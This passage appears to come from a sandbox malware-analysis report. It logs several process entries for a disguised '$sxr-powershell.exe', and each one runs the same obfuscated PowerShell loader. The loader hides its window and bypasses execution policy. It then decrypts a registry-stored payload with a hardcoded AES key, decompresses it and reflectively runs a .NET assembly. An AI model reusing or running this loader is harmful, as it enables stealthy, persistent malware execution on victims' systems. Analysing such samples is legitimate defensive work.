'').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        Hide Artifacts: Hidden Window
        
        PID:7248
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(10108).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        32⤵
        
        PID:3076
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:10148
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 